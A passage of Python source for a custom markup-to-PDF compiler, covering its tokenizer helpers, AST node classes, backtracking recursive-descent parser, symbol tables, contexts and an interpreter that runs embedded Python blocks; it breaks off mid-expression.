valid name with all characters of it in {CMND_CHARS}\n"{self._current_char}" is not one of the valid characters. You either forgot to designate a valid command name or forgot to escape the backslash before this character.') token = Token(TT.IDENTIFIER, identifier_name, start_pos.copy(), self._pos.copy(), space_before=space_before) return token # ------------------------------------------------------------------------- # Other Helper Methods def _try_word_token(self): """ Create a WORD token given what is in self._plain_text """ self._plain_text = re.sub('(\s)+', '', self._plain_text) if len(self._plain_text) > 0: self._tokens.append(Token(TT.WORD, self._plain_text, self._plain_text_start_pos, self._pos.copy(), space_before=self._space_before_plaintext)) self._space_before_plaintext = False self._plain_text = '' self._plain_text_start_pos = None def _plain_text_char(self): """ The current_char is a plain_text character """ if self._plain_text_start_pos is None: self._plain_text_start_pos = self._pos.copy() if self._pos.idx - 1 >= 0: self._space_before_plaintext = (self._text[self._pos.idx - 1] in WHITE_SPACE_CHARS) else: self._space_before_plaintext = False self._plain_text += self._current_char self._advance() def _match(self, matches:list, advance_past_on_match=True): """ Takes the given list of strings to match and sees if any of them match the text at the current index of the self._text This method does not look forward in the text for a match, just returns True if the string starting at the current index matches any of the matches. If advance_past_on_match, then if this method matches something, it will advance past the string it matched. 
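        For example (illustrative), self._match(['<-'], advance_past_on_match=False)
        only reports whether the text at the current index starts with '<-',
        while the default behaviour would also advance past the matched string.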
""" index = self._pos.idx for str_to_match in matches: if ((index + len(str_to_match)) < len(self._text)) \ and (str_to_match == self._text[index:index + len(str_to_match)]): if advance_past_on_match: self._advance(len(str_to_match)) return True return False # ----------------------------------------------------------------------------- # Nodes for Parser DUMMY_POSITION = Position(0, 0, 0, 'Dummy File Name', 'Dummy File Text') class LeafNode: """ Base class for all Leaf Nodes (nodes that can only have one token) """ __slots__ = ['start_pos', 'end_pos'] def __init__(self, token): """ Takes a token and sets the start and end positions using it. Still must name the token in the actual node (i.e. self.writing, etc.) """ self.start_pos = token.start_pos self.end_pos = token.end_pos class FileNode: __slots__ = ['start_pos', 'end_pos', 'file_start', 'document', 'file_end'] def __init__(self, file_start, document, file_end): self.file_start = file_start # Token self.document = document # DocumentNode self.file_end = file_end # Token self.start_pos = file_start.start_pos self.end_pos = file_end.end_pos def __repr__(self): return f'{self.__class__.__name__}({self.file_start}, {self.document}, {self.file_end})' class DocumentNode: __slots__ = ['start_pos', 'end_pos', 'starting_paragraph_break', 'paragraphs', 'ending_paragraph_break'] def __init__(self, paragraphs, starting_paragraph_break=None, ending_paragraph_break=None): self.starting_paragraph_break = starting_paragraph_break # Token self.paragraphs = paragraphs # List of ParagraphNodes self.ending_paragraph_break = ending_paragraph_break # Token if starting_paragraph_break: self.start_pos = starting_paragraph_break.start_pos elif len(paragraphs) > 0: self.start_pos = paragraphs[0].start_pos else: self.start_pos = DUMMY_POSITION.copy() if len(paragraphs) > 0: self.end_pos = paragraphs[-1].end_pos elif ending_paragraph_break: self.end_pos = ending_paragraph_break.end_pos elif starting_paragraph_break: self.end_pos = starting_paragraph_break.end_pos else: self.end_pos = DUMMY_POSITION.copy() def __repr__(self): return f'{self.__class__.__name__}({self.paragraphs})' class ParagraphNode: __slots__ = ['start_pos', 'end_pos', 'writing', 'paragraph_break'] def __init__(self, paragraph_break, writing): self.paragraph_break = paragraph_break # Token self.writing = writing # WritingNode self.start_pos = writing.start_pos if paragraph_break: self.end_pos = paragraph_break.end_pos else: self.end_pos = writing.end_pos def __repr__(self): return f'{self.__class__.__name__}({self.writing})' class WritingNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['writing']) def __init__(self, writing): """ writing can be either a python node or a plain_text node. 
""" super().__init__(writing) self.writing = writing # PythonNode or PlainTextNode def __repr__(self): return f'{self.__class__.__name__}({self.writing})' class PythonNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['python', 'python_string']) def __init__(self, python): """ python is a single python Token (PASS1EXEC|PASS2EXEC|PASS1EVAL|PASS2EVAL) """ super().__init__(python) self.python = python # one of the exec or eval Nodes self.python_string = None def __repr__(self): return f'{self.__class__.__name__}({self.python})' class CommandDefNode: __slots__ = ['start_pos', 'end_pos', 'cmnd_name', 'cmnd_params', 'cmnd_key_params', 'text_group'] def __init__(self, cmnd_name, cmnd_params, cmnd_key_params, text_group): self.start_pos = cmnd_name.start_pos self.end_pos = text_group.end_pos self.cmnd_name = cmnd_name # IDENTIFIER Token self.cmnd_params = cmnd_params # list of CommandParamNodes self.cmnd_key_params = cmnd_key_params # list of CommandKeyParamNodes self.text_group = text_group # the text_group that the command will run def __repr__(self): cmnd_args = '' for i, arg in enumerate(self.cmnd_params): if i > 0: cmnd_args += ', ' cmnd_args += f'{arg}' return f'{self.__class__.__name__}({self.cmnd_name} = ({cmnd_args}) ' + '{' + f'{self.text_group}' + '}' + ')' class CommandParamNode: __slots__ = ['start_pos', 'end_pos', 'identifier'] def __init__(self, identifier): self.start_pos = identifier.start_pos self.end_pos = identifier.end_pos self.identifier = identifier # IDENTIFIER Token def __repr__(self): return f'{self.__class__.__name__}({self.identifier})' class CommandKeyParamNode: __slots__ = ['start_pos', 'end_pos', 'key', 'text_group'] def __init__(self, key, text_group): self.start_pos = key.start_pos self.end_pos = text_group.end_pos self.key = key # WORD Token self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.text_group})' class CommandCallNode: __slots__ = ['start_pos', 'end_pos', 'cmnd_name', 'cmnd_tex_args', 'cmnd_key_args'] def __init__(self, cmnd_name, cmnd_tex_args, cmnd_key_args): self.start_pos = cmnd_name.start_pos self.end_pos = cmnd_name.end_pos self.cmnd_name = cmnd_name # IDENTIFIER Token self.cmnd_tex_args = cmnd_tex_args # list of CommandTexArgNode self.cmnd_key_args = cmnd_key_args # dict of keyword:CommandArgNode pairs def __repr__(self): string = f'{self.__class__.__name__}(\\{self.cmnd_name}' # add args for arg in self.cmnd_tex_args: string += '{' + f'{arg}' + '}' # add kwargs for kwarg in self.cmnd_key_args: string += '{' + f'{kwarg.key}={kwarg.text_group}' + '}' # end string string += ')' return string class CommandTexArgNode: __slots__ = ['start_pos', 'end_pos', 'text_group'] def __init__(self, text_group): self.start_pos = text_group.start_pos self.end_pos = text_group.end_pos self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.text_group})' class CommandKeyArgNode: __slots__ = ['start_pos', 'end_pos', 'key', 'text_group'] def __init__(self, key, text_group): self.start_pos = key.start_pos self.end_pos = text_group.end_pos self.key = key # IDENTIFIER Token self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.key}={self.text_group})' class TextGroupNode: __slots__ = ['start_pos', 'end_pos', 'ocbrace', 'document', 'ccbrace'] def __init__(self, ocbrace, document, ccbrace): self.start_pos = ocbrace.start_pos self.end_pos = ccbrace.end_pos self.ocbrace = ocbrace self.document = document 
self.ccbrace = ccbrace def __repr__(self): return f'{self.__class__.__name__}({self.document})' class PlainTextNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['plain_text']) def __init__(self, plain_text:list): """ plain_text is a list of OCBRACE, CCBRACE, EQUAL_SIGN, and WORD Tokens in any order. """ self.plain_text = plain_text # list of Tokens if len(plain_text) > 0: self.start_pos = plain_text[0].start_pos self.end_pos = plain_text[-1].end_pos else: self.start_pos = DUMMY_POSITION.copy() self.end_pos = DUMMY_POSITION.copy() def __repr__(self): return f'{self.__class__.__name__}({self.plain_text})' # ----------------------------------------------------------------------------- # Parser Class and Related class ParseResult: """ A class that wraps results from the Parser because the parser will be trying out different things (is the next token plain text or a paragraph break? neither? then whats the next thing it could be?) and this ParseResult allows the Parser to try something and then undo that thing. An error can also can be returned if none of the things that were supposed to work actually work. """ __slots__ = ['error', 'node', 'last_registered_advance_count', 'advance_count', 'to_reverse_count', 'affinity'] def __init__(self): self.error = None self.node = None self.last_registered_advance_count = 0 self.advance_count = 0 self.to_reverse_count = 0 self.affinity = 0 def register_advancement(self): """ Registers that the Parser advanced a token so that that advancement can be undone later if need be. """ self.last_registered_advance_count = 1 self.advance_count += 1 def register(self, res): """ Registers a result, adding the error to this result if there was one and returning the node. """ self.last_registered_advance_count = res.advance_count self.advance_count += res.advance_count self.affinity += res.affinity if res.error: self.error = res.error return res.node def register_try(self, res): """ Returns None if the given result did not work and the Node of the result if it did. """ if res.error: self.affinity += res.affinity self.to_reverse_count = res.advance_count return None return self.register(res) def reversing(self): """ The last try is being reverse so set the to_reverse_count back to 0 and return what it was so that it can be reversed. """ to_reverse = self.to_reverse_count self.to_reverse_count = 0 return to_reverse def add_affinity(self, amt=1): """ Affinity is how far along the result was getting before it ran into an error. This is useful for when there are multiple possibilities as to where the errors my be coming from such as in the writing rule of this language's grammar. This affinity can be used to see whether any of the rules applied or not because if non of them did, then the parser is probably just at the end of the file. """ self.affinity += amt def success(self, node): self.node = node return self def failure(self, error): if not self.error or self.last_registered_advance_count == 0: self.error = error return self class Parser: """ Creates an Abstract Syntax Tree based on the rules in grammar.txt. Look at grammar.txt for the outline of what the Parser is trying to do. It takes each rule and recursively tries to make it work. When a rule does not work, it returns a ParseResult with an error in ParseResult.error. In the case of the error, the index is changed back to what it was before the Parser tried the rule. If there was no error, then the Node that was successfully created by the rule is returned. 
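    A typical invocation (illustrative) tokenizes a file and then parses the
    resulting tokens:

        result = Parser(Tokenizer(file_path, file_text).tokenize()).parse()
        if result.error:
            print(result.error.as_string())
        else:
            ast = result.node   # a FileNode wrapping the DocumentNode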
This Parser uses a top-down approach to parsing, as opposed to a bottom-up approach to parsing, which is a far harder method of parsing to write a Parser for. """ def __init__(self, tokens, print_progress_bar=False): # Progress Printing Info self._print_progress_bar = print_progress_bar self._tokens_len = len(tokens) file_path = '' if self._tokens_len == 0 else tokens[0].start_pos.file_path self._progress_bar_prefix = prog_bar_prefix('Parsing', file_path) self._prog_bar_refresh = calc_prog_bar_refresh_rate(self._tokens_len) # Things needed to actually parse the tokens self._tokens = tokens self._tok_idx = -1 self._current_tok = None self._advance() def parse(self): """ Returns a ParseResult with either an error in res.error or a node in res.node """ if self._print_progress_bar: print_progress_bar(self._tok_idx, self._tokens_len, self._progress_bar_prefix) if self._current_tok.type == TT.FILE_START: res = self._file() else: res = self._document() if self._print_progress_bar: print_progress_bar(self._tok_idx, self._tokens_len, self._progress_bar_prefix) return res # ------------------------------ # Main Helper Methods def _advance(self, parse_result=None): """ Advances to the next token. It returns the token before the new one and registers an advancement with the given parse_result for convenience. """ prev_token = self._current_tok if parse_result: parse_result.register_advancement() self._tok_idx += 1 self._update_current_tok() return prev_token def _reverse(self, parse_result): self._tok_idx -= parse_result.reversing() self._update_current_tok() def _update_current_tok(self): if self._tok_idx >= 0 and self._tok_idx < len(self._tokens): self._current_tok = self._tokens[self._tok_idx] else: # TT.NONE_LEFT will NOT match any Tokens needed for any rule, # forcing an error to occur in each rule and the rules to # terminate. This is much safer than just not changing the token # any more when you run out of tokens to parse because now, even if # you have a low-level rule that will accept infinitely many of a # token of a certain type, that type will not be infinitely given # if the list of tokens ends on it if self._current_tok is not None: self._current_tok = Token(TT.NONE_LEFT, 'NO TOKENS LEFT', self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy()) else: dummy_start_pos = DUMMY_POSITION.copy() dummy_end_pos = dummy_start_pos.copy() self._current_tok = Token(TT.NONE_LEFT, 'NO TOKENS LEFT', dummy_start_pos, dummy_end_pos) # ------------------------------ # Rules def _file(self): """ A document but with a FILE_START token at the beginning and a FILE_END token at the end. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() if self._current_tok.type == TT.FILE_START: file_start = self._advance(res) else: return res.failure(InvalidSyntaxError(start_pos, start_pos.copy().advance(), 'For some reason, your file does not begin with a FILE_START Token. This is a Compiler Error, so contact the developer and let them know.')) document = res.register(self._document()) if res.error: return res if self._current_tok.type == TT.FILE_END: file_end = self._advance(res) else: return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), f'Reached the end of the file but there was no FILE_END Token. 
The file must have Invalid Syntax or the compiler is having issues.\nALL TOKENS: {self._tokens}\n\nLAST TOKEN SEEN: {self._current_tok}\n\nLast Token Seen Index: {self._tok_idx}')) return res.success(FileNode(file_start, document, file_end)) def _document(self): """ A document is a group of paragraphs, essentially. """ res = ParseResult() paragraphs = [] # will eat token if there, otherwise nothing self._eat_pb(res) print_prog_bar = self._print_progress_bar if print_prog_bar: refresh = self._prog_bar_refresh toks_len = self._tokens_len prefix = self._progress_bar_prefix while True: # paragraph will be None if the try failed, otherwise it will be the # new ParagraphNode result = self._paragraph() if result.error and result.affinity > 0: res.register(result) return res paragraph = res.register_try(result) # If, when we tried to make another paragraph, it failed, # that means that there are no more paragraphs left in the # document, so undo the try by going back the number of # tokens that the try went forward if not paragraph: self._reverse(res) break else: if print_prog_bar: i = self._tok_idx if (i % refresh) == 0: print_progress_bar(i, toks_len, prefix) paragraphs.append(paragraph) self._eat_pb(res) return res.success(DocumentNode(paragraphs)) def _paragraph(self): """ A peice of writing, with a paragraph break before it possibly. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() # Check for Paragraph Break paragraph_break = self._eat_pb(res) # Check for Writing writing = res.register(self._writing()) if res.error: return res # writing should be a WritingNode and paragraph_break is a Token of # type PARAGRAPH_BREAK return res.success(ParagraphNode(paragraph_break, writing)) def _writing(self): """ A peice of writing such as something to run in python, a command def or command call, text group, or pain text. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() results = [] new_res = self._python() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._cmnd_def() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._cmnd_call() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._plain_text() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._text_group() results.append(new_res) writing = res.register_try(new_res) if not writing: best_result = None for result in results: if result.affinity > 0 and ((not best_result) or result.affinity > best_result.affinity): best_result = result if not best_result: return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'There was no writing, but writing was expected.' )) else: return res.failure(best_result) # writing should be either a PythonNode or a PlainTextNode return res.success(WritingNode(writing)) def _python(self): """ This fulfills the python rule of the grammar. 
""" res = ParseResult() ct = self._current_tok type = self._current_tok.type # Python Switch Statement to figure out whether the token is a Python Token try: python = { TT.EXEC_PYTH1: ct, TT.EVAL_PYTH1: ct, TT.EXEC_PYTH2: ct, TT.EVAL_PYTH2: ct }[ct.type] except KeyError: return res.failure(InvalidSyntaxError(ct.start_pos.copy(), ct.start_pos.copy().advance(), 'Expected a Token of Type PASS1EXEC, PASS1EVAL, PASS2EXEC, or PASS1EVAL but did not get one.') ) self._advance(res) # python should be a single python Token of type PASS1EXEC or PASS2EXEC # or PASS1EVAL or PASS2EVAL return res.success(PythonNode(python)) def _cmnd_def(self): """ A command definition. For example: \\hi = (\\first_name, \\last_name={}) { Hello \\first_name \\last_name } """ res = ParseResult() cmnd_name = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) equal_sign = res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) cmnd_params = [] # (OPAREN PB? (cmnd_params PB? (COMMA PB? cmnd_params)*)? PB? CPAREN)? oparen = res.register_try(self._need_token(TT.OPAREN)) if oparen: res.add_affinity() self._eat_pb(res) cmnd_param = res.register_try(self._cmnd_param()) if not cmnd_param: self._reverse(res) else: res.add_affinity() cmnd_params.append(cmnd_param) while True: self._eat_pb(res) comma = res.register_try(self._need_token(TT.COMMA)) if not comma: self._reverse(res) break res.add_affinity() cmnd_param = res.register(self._cmnd_param()) if res.error: return res.failure(InvalidSyntaxError( comma.start_pos.copy(), comma.end_pos.copy(), 'Extra comma. You need to either have a variable name after it or remove it.' )) res.add_affinity() cmnd_params.append(cmnd_param) self._eat_pb(res) cparen = res.register(self._need_token(TT.CPAREN)) if res.error: return res.failure(InvalidSyntaxError( oparen.start_pos, oparen.end_pos, 'You need to have a matching closing parenthesis ")" to match this parenthisis after your parameters for the Command Definition.' )) res.add_affinity() self._eat_pb(res) # text_group text_group = res.register(self._text_group()) if res.error: return res.failure(InvalidSyntaxError( self._current_tok.start_pos, self._current_tok.end_pos, 'Here, you need to have a pair of curly brackets "{}", at the very least, in order to finish off this command definition.' )) res.add_affinity() cmnd_tex_params = [] cmnd_key_params = [] for param in cmnd_params: if isinstance(param, CommandParamNode): cmnd_tex_params.append(param) elif isinstance(param, CommandKeyParamNode): cmnd_key_params.append(param) else: raise Exception(f'This was outputted as a command parameter but is not one: {param}') return res.success(CommandDefNode(cmnd_name, cmnd_tex_params, cmnd_key_params, text_group)) def _cmnd_param(self): """ A command Parameter. 
So either \\hi = {a default value} or \\hi """ res = ParseResult() self._eat_pb(res) text_group = res.register_try(self._cmnd_key_param()) if text_group: return res.success(text_group) self._reverse(res) text_group = res.register_try(self._cmnd_tex_param()) if text_group: return res.success(text_group) else: self._reverse(res) return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'Expected a Command Parameter here.')) def _cmnd_key_param(self): """ A command parameter so \\hi = {a default value} """ res = ParseResult() self._eat_pb(res) key = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() return res.success(CommandKeyParamNode(key, text_group)) def _cmnd_tex_param(self): """ A command parameter that is just an IDENTIFIER """ res = ParseResult() ident = res.register(self._need_token(TT.IDENTIFIER)) res.add_affinity() if not ident: return res else: return res.success(CommandParamNode(ident)) def _cmnd_call(self): """ A command call like \\hi or \\hi{FirstName}{\\last_name={LastName}} """ res = ParseResult() cmnd_name = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() args = [] while True: arg = res.register_try(self._cmnd_arg()) if not arg: self._reverse(res) break res.add_affinity() args.append(arg) cmnd_tex_args = [] cmnd_key_args = [] for arg in args: if isinstance(arg, CommandTexArgNode): cmnd_tex_args.append(arg) elif isinstance(arg, CommandKeyArgNode): cmnd_key_args.append(arg) else: raise Exception(f'Expected a command argument Node, instead got: {arg}') return res.success(CommandCallNode(cmnd_name, cmnd_tex_args, cmnd_key_args)) def _cmnd_arg(self): """ A cmnd argument such as {FirstName} or {\\first_name={FirstName}} in \\hi{FirstName}{\\first_name={FirstName}} """ res = ParseResult() arg = res.register_try(self._cmnd_key_arg()) if arg: return res.success(arg) self._reverse(res) arg = res.register_try(self._cmnd_tex_arg()) if arg: return res.success(arg) self._reverse(res) return res.failure(InvalidSyntaxError( self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'Expected a Command Argument here.' 
)) def _cmnd_tex_arg(self): """ A command text argument \\he{FirstName} """ res = ParseResult() text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() return res.success(CommandTexArgNode(text_group)) def _cmnd_key_arg(self): """ A command key argument such as {\\first_name={FirstName}} in \\he{\\first_name={FirstName}} """ res = ParseResult() res.register(self._need_token(TT.OCBRACE)) if res.error: return res res.add_affinity() ident = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() res.register(self._need_token(TT.CCBRACE)) if res.error: return res res.add_affinity() return res.success(CommandKeyArgNode(ident, text_group)) def _text_group(self): """ A text group is { document } """ res = ParseResult() ocb = res.register(self._need_token(TT.OCBRACE)) if res.error: return res res.add_affinity() document = res.register(self._document()) if res.error: return res res.add_affinity() ccb = res.register(self._need_token(TT.CCBRACE)) if res.error: return res res.add_affinity() return res.success(TextGroupNode(ocb, document, ccb)) def _plain_text(self): res = ParseResult() plain_text = [] while True: cc = self._current_tok start_pos = cc.start_pos # Python Switch Statement try: new_tok = { TT.BACKSLASH: cc, TT.EQUAL_SIGN: cc, TT.COMMA: cc, TT.OPAREN: cc, TT.CPAREN: cc, TT.OBRACE: cc, TT.CBRACE: cc, TT.WORD: cc }[cc.type] # If I remember correctly, you cannot directly wrap the dict # in this append method because it appends the error # to the list when there is an error, which is problematic plain_text.append(new_tok) res.add_affinity() except KeyError: break self._advance(res) if len(plain_text) == 0: return res.failure(InvalidSyntaxError(start_pos.copy(), start_pos.copy().advance(), 'Expected atleast 1 WORD, BACKSLASH, OCBRACE, CCBRACE, or EQUAL_SIGN Token.' ) ) # plain_text is a list of OCBRACE, CCBRACE, EQUAL_SIGN, and WORD Tokens # in any order. return res.success(PlainTextNode(plain_text)) # ------------------------------------------------------------------------- # Non-Rule Lesser Help Methods def _eat_pb(self, parse_result): """ Eat a PARAGRAPH_BREAK A helper method that, unlike the other methods, just exists because there are many rules with PARAGRAPH_BREAK? in them. This method does that, returning None if the current token is not a PARAGRAPH_BREAK and the PARAGRAPH_BREAK Token if there is one. If a PARAGRAPH_BREAK token is found, the method also advances past past it. """ par_break = None if self._current_tok.type == TT.PARAGRAPH_BREAK: par_break = self._advance(parse_result) return par_break def _need_token(self, token_type): """ A helper method that just checks that a token exists right now. Will return a ParseResult with an error if the token is not the required one and a ParseResult with the node of the result being the token if the current token is the correct one. This method exists not because there is a Node for it (there is not one) but because what this method does is something that needs to be done a lot in the parse methods. 
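A minimal usage sketch, mirroring how the rule methods in this Parser already
call it (for example in _text_group); nothing here is new API:

    ocb = res.register(self._need_token(TT.OCBRACE))
    if res.error:
        return res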
""" res = ParseResult() if not (self._current_tok.type == token_type): return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), f'Expected a Token of type {token_type}, but got token {self._current_tok}')) return res.success(self._advance(res)) # ----------------------------------------------------------------------------- # Interpreter and Related Classes class RunTimeResult: """ Wraps a return value in the Interpreter so that, when a visit method finishes visiting a Node, it can tell the Node that visited it various things such as whether to return immediately or not. """ __slots__ = ['value', 'error'] def __init__(self): self.reset() def reset(self): self.value = None self.error = None def register(self, res): """ Register the returned result from a Node you just visited. This way, if you should return because an error occured or something, you can. """ self.error = res.error return res.value def success(self, value): self.reset() self.value = value return self def failure(self, error): self.reset() self.error = error return self class SymbolTable: """ The symbol table is used to store the commands. """ def __init__(self, parent=None): self.symbols = {} self.parent = parent def get(self, name): """ Returns the value for the name if it is in the SymbolTable, None otherwise """ value = self.symbols.get(name, None) if value == None and self.parent: return self.parent.get(name) return value def set(self, name, value): """ Sets a the value for a name in the symbol table """ self.symbols[name] = value def remove(self, name): """ Removes a name from the symbol table. """ self.symbols.pop(name) def import_(self, other_symbol_table, commands_to_import=None): """ Imports the symbols of the other symbol table into this one. If commands_to_import is None, then import every command. Otherwise, only import the commands with the names listed. """ if commands_to_import is None: self.symbols.update(other_symbol_table.symbols) else: oth_syms = other_symbol_table.symbols for command_name in commands_to_import: if command_name in oth_syms: self.symbols[command_name] = oth_syms[command_name] else: raise AssertionError(f'Could not import {command_name}.') def copy(self): import copy new = SymbolTable(None if self.parent is None else self.parent.copy()) new.symbols = copy.deepcopy(self.symbols) return new def __repr__(self): string = f'\n{type(self).__name__}(' string += f'symbols={self.symbols}' string += ')' return string class Context: """ Provides Context for every command/amount of python code that is run. By that I mean that the Context determines what commands and variables are available and when. """ __slots__ = ['display_name', 'file_path', 'entry_pos', 'parent', '_globals', '_locals', 'symbols', '_token_document', 'global_level'] def __init__(self, display_name, file_path, parent=None, entry_pos=None, token_document=None, globals=None, locals=None, symbol_table=None): """ Context could be a function if in a function or the entire program (global) if not in a function. """ self.display_name = display_name # the command/program name self.file_path = file_path # the path to the file that the command is in self.entry_pos = entry_pos # the position in the code where the context changed (where the command was called) self.parent = parent # Parent context if there is one # These are the globals and locals used by Python. 
The SymbolTable is # used for Commands, not these self._globals = globals # dict or None self._locals = locals # dict or None # Make sure that there are globals self.globals() # will throw an error if there are no globals, even in parent contexts if symbol_table is not None: assert_instance(symbol_table, SymbolTable, or_none=False) self.symbols = symbol_table # SymbolTable elif parent is not None and parent.symbols is not None: self.symbols = SymbolTable(parent.symbols) else: self.symbols = SymbolTable() if token_document is not None: self._token_document = token_document else: self._token_document = [] self.global_level = True def __repr__(self): string = f'\n{type(self).__name__}(\n' string += f'\tdisplay_name={self.display_name}' string += f'\tsymbols={self.symbols}' string += f'\tglobals={self._globals}' string += f'\tlocals={self._locals}' string += f'\tparent={self.parent}' string += '\n)' return string def copy(self): _globals = None if self._globals is None else {key:val for key, val in self._globals.items()} _locals = None if self._locals is None else {key:val for key, val in self._locals.items()} entry_pos = None if self.entry_pos is None else self.entry_pos.copy() parent = None if self.parent is None else self.parent.copy() new = Context(self.display_name, self.file_path, parent, entry_pos, self._token_document[:], _globals, _locals) new.symbols = self.symbols.copy() return new def gen_child(self, child_display_name:str, child_entry_pos=None, locals_to_add=None): """ Generates a child context i.e. a subcontext such as that which is inside a command. locals_to_add are things like the \\test variable below, which should be made available to any Python Code that is inside the command \\# Global Context \\hello = (\\test) = { \\# This should have a subcontext where commands can be defined in \\# here but not mess with those defined in the global context/ \\# any parent context \\test \\# is defined in this child context } \\# \\test is undefined here, in this global context """ # Generate the new python locals. Because only one locals dict can be # passed to an exec or eval method at a time, it must have all the # references to parent locals in it so that it works as if it could # look up the locals hierarchy as the SymbolTables do for Commands # In other words, the child Context's locals must be a superset of this # Context's locals child_lcls = {} if (self._locals is None) else {key:val for key, val in self._locals.items()} if locals_to_add: child_lcls.update(locals_to_add) parent = self # Give the new context a reference to globals so that it does not have # to walk up a bunch of parents to get it anyway child = Context(child_display_name, self.file_path, parent, child_entry_pos, self.token_document(), self.globals(), child_lcls, SymbolTable(self.symbols)) child.global_level = False return child def import_(self, other_context, tokens_to_import=[], commands_to_import=None): """ Takes another context and imports its contents into this one. """ self.symbols.import_(other_context.symbols, commands_to_import) self.globals().update(other_context.globals()) self.token_document().extend(tokens_to_import) def globals(self): if self._globals is not None: return self._globals elif self.parent is not None: return self.parent.globals() else: raise Exception("You did not pass in globals to the Global Context.") def locals(self): return self._locals def token_document(self): """ The list of tokens that should be given to the Placer object to actually make the PDFDocument. 
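A hedged sketch of how this list is eventually consumed, based on
Compiler.compile_pdf later in this file (the variable names are placeholders):

    TokenStream(context.token_document(), placer_class, context.globals(),
                input_file_path, print_progress_bars).place_tokens()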
""" return self._token_document def set_token_document(self, new_doc): self._token_document = new_doc class InterpreterFlags: """ Flags for the Interpreter so that it can know what to do when it does a pass over an Abstract Syntax Tree created by the Parser. The difference between these flags and the context in the Interpreter is that things in the flags stay the same for the entire AST pass whereas the things in the context could change at each visit to a node. """ def __init__(self): pass class Interpreter: """ The interpreter visits each node in the Abstract Syntax Tree generated by the Parser and actually runs the corresponding code for the node. """ def __init__(self): self._context_stack = [] self._curr_context = None self._command_node_stack = [] self._curr_command_node = None def _push_context(self, context): self._context_stack.append(context) self._curr_context = context def _pop_context(self): self._context_stack.pop() self._curr_context = self._context_stack[-1] if len(self._context_stack) > 0 else None def curr_context(self): return self._curr_context def _push_command_node(self, command_node): self._command_node_stack.append(command_node) self._curr_command_node = command_node def _pop_command_node(self): self._command_node_stack.pop() self._curr_command_node = self._command_node_stack[-1] if len(self._command_node_stack) > 0 else None def curr_command_node(self): return self._curr_command_node def visit_root(self, node, context, flags, print_progress=False): """ The visit to the root node of an AST. """ if print_progress: print(prog_bar_prefix(f'{OUT_TAB}Running AST for ', f'{context.display_name}', align='>', suffix='', append='...')) prev_context = self._curr_context self._curr_context = context result = self.visit(node, context, flags) self._curr_context = prev_context if print_progress: print(prog_bar_prefix(f'{OUT_TAB}Done Running AST for ', context.display_name, align='>', suffix='', append='')) return result def visit(self, node, context, flags): method_name = f'_visit_{type(node).__name__}' method = getattr(self, method_name, self._no_visit_method) return method(node, context, flags) def _no_visit_method(self, node, context, flags): raise Exception(f'No _visit_{type(node).__name__} method defined in Interpreter') # ------------------------------ # Rule Implementations def _visit_FileNode(self, node, context, flags): res = RunTimeResult() result = res.register(self.visit(node.document, context, flags)) if res.error: return res return res.success(result) def _visit_DocumentNode(self, node, context, flags): res = RunTimeResult() document = [] was_global = context.global_level if was_global: context.global_level = False for paragraph in node.paragraphs: write_tokens = res.register(self.visit(paragraph, context, flags)) if res.error: return res else: if was_global: context.token_document().extend(write_tokens) document.extend(write_tokens) if was_global: context.global_level = True return res.success(document) def _visit_ParagraphNode(self, node, context, flags): res = RunTimeResult() # How long the document has gotten so far i = len(context.token_document()) # Visit the writing (could be Plaintext, Python, command def, or a Command call) write_tokens = res.register(self.visit(node.writing, context, flags)) if res.error: return res if len(write_tokens) > 0: # Command was called and this Class was used to make the length # of the write_tokens > 0 because a command was called if write_tokens[0] == Interpreter.CommandCalled: write_tokens.pop(0) if node.paragraph_break: # Add 
the paragraph break to before the current text was added context.token_document().insert(i, node.paragraph_break) return res.success(write_tokens) def _visit_WritingNode(self, node, context, flags): """ Visits a WritingNode. If successful, this method will return a string of what the ParagraphNode is supposed to write. """ res = RunTimeResult() write_tokens = res.register(self.visit(node.writing, context, flags)) # Error Handling if res.error: return res return res.success(write_tokens) def _visit_PythonNode(self, node, context, flags): res = RunTimeResult() python_token = node.python tt = python_token.type # Execute or eval python if tt == TT.EXEC_PYTH1: python_result = exec_python(python_token.value, context.globals(), context.locals()) elif tt == TT.EVAL_PYTH1: python_result = eval_python(python_token.value, context.globals(), context.locals()) # For second pass python, it needs to be kept until we are actually # placing the text on the PDF, then the Placer will be made available # to the python and the code can make changes to the PDF elif tt in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): python_result = [python_token.gen_pass_2_python( \ None if context.locals() is None else \ {key:val for key, val in 